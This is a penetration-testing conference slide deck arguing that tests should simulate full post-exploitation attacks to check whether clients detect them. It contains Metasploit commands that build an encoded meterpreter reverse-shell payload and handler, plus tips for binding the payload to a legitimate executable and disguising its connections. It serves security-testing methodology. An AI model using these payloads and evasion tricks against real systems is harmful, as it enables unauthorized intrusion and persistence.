Simulating Real World Attack
- 1. Simulating Real World Attacks Thomas Mackenzie
- 2. Acknowledgements Chris Nickerson Carlos Perez Simon Whitehouse
- 3. Introduction / Scope Are clients aware of attacks happening to them? If they are not, how can we help them? How can we test if they aware of an attack?
- 4. Remediation of an Attack Remediation - Step One - Fixing the vulnerability that was exploited Step Two - Dealing with what happened post exploitation
- 5. Case Study Lush.co.uk They found out at the end of January about the attack Stated that the attack started “they think” on the 4th October
- 6. Case Study cont. Zurich UK Lost 46,000 Customer Records Found out 1 year later Cost £2.28 million in fines - Not to mention fixing
- 7. Case Study cont. Chain of events - When did it start? When did it end? What information was available to the attacker? What information was compromised? Not counting - How it happened. How to stop it from happening again.
- 8. What am I saying? Yes - If they knew about the vulnerability in the first place they could have stopped this from happening. But they didn’t - The attack happened and it has cost them money to not just fix but to the chain of events stuff too.
- 9. Attacks we see Layer 8 (Management) Development Issues 0-Days Passive Actions / Obfuscation Methods
- 10. Attacks we see cont. These attacks are what we are seeing at the moment. When we do testing for clients we stop at the vulnerability. We stop at the exploit and we do not carry on.
- 11. Attacks we see cont. Stopping at the vulnerability means - The client get to do Step One of remediation What about Step Two?
- 12. It is important!!! Without the proper things in place it can take a long time to fix this. Self Detection Law Enforcement Public Detection Regulatory Detection 0 50 100 150 200
- 13. Why didn’t they know? There are a lot of things in place at the moment that help people detect attacks / even stop them. IDS / IPS / FW / Logs etc. Attacks are still occurring and we are still hearing about them all the time.
- 14. Why didn’t they know? cont. Do we test this in our pen test? How can we test if they are aware of an attack? Certainly not by just exploiting the vulnerability we have to deep dive.
- 15. Is it Real? Unless what you do is real your client WILL NOT CARE!
- 25. Ask them! Ask them what they care about Why do they care?
- 26. The Brand
- 27. Employees
- 28. Customers
- 29. Money
- 30. Unless... Unless the attack happens for real they don’t have to deal with the aftermath! Are they prepared?
- 31. IR Not all companies have IR teams How long does it take for the attackers trail to be found?
- 32. Knowing you have been compromised = good When and how long for = better
- 33. Reporting When it comes to the report attack them with simulated examples - examples you could recreate. Could you kill someone? Can you steal money? Can you change / recreate their product?
- 34. Report cont. Give a time window / speak to only one person Document everything you do Ask them what they saw you do Compare
- 35. Did they know? Did they know you were attacking them If so did they try to stop you? If not why not!
- 37. Noise Levels Low - Ninja Hacking Skillz Medium - Make a few mistakes that should be detected High - Scan them to hell and back
- 38. Graded Levels Level 1 - 5 Starting at Script Kiddies to Criminal
- 39. What are we doing! Attacking systems with real results instead of just giving information they don’t care about.
- 40. Methods Low hanging fruit are the first checkpoints Processes, connections, EventLog and in some case memory dumps
- 41. Processes Time of creation Parent PID Owner Command Line
- 42. Hide! Hide your connections SVCHOST.exe looks normal if connecting to high ports Firefox, Dropbox, AV 80 and 443
- 43. Example So what are we actually talking about? How can we go about simulating an attack like what we have just spoken about?
- 44. Ask and you shall receive Brief Discuss options for testing What is important to them?
- 45. Seek and you will find What was important to them? Are they any exploits / 0-days for that piece of software?
- 46. Knock and the door will be opened Simply and easily do not give up There is always going to be some avenue of attack for this client they may just not know about it Look at the following example
- 47. Attacking Layer 8 Idiots in the company are your first point of call. Is the CEO an idiot? Skype is important to them - attack them with what is important!
- 48. Attacking Layer 8 cont. ./msfpayload windows/meterpreter/reverse_tcp LHOST = x.x.x.x R | ./msfencode -e x86/ shikata_ga_nai -c 5 -t exe -o payload.exe ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x exploit
- 49. Attacking Layer 8 cont. Using IExpress you can bind a primary .exe. and your payload together Settings available in IExpress Running that evil .exe (BANG) reverse shell!
- 50. Do not leave it there! What did I say at the beginning? Once you have shell do something with it so that it actually means something to them Delete data / change data / get addresses / create ways to stay there!
- 51. But WAIT!!! POLITICS! You cannot just delete data without permission! Make sure you find out what you can do!
- 52. If you can delete... You most likely can add
- 53. What is better?
- 54. What is better?
- 55. This?
- 56. What is better?
- 57. What is better?
- 58. This?
- 59. WHAT IS ALL THIS! By simulating theses attacks the way I am talking about the client can then see exactly what they would need to do if it was a real attack!
- 60. Future @sponex and I are creating a website about this and some guides that link to some good methodologies out there.
- 61. Summary Attack them, don’t pussy foot around! Find out what they care about. Make them realise how hard it would be to fix.
- 62. :~$ whoami Director of upSploit Limited Soon to be Web Application Security Consultant for Trustwave British Student Podcaster
- 63. Questions thomas@tmacuk.co.uk www.tmacuk.co.uk / @tmacuk www.upsploit.com / @upsploit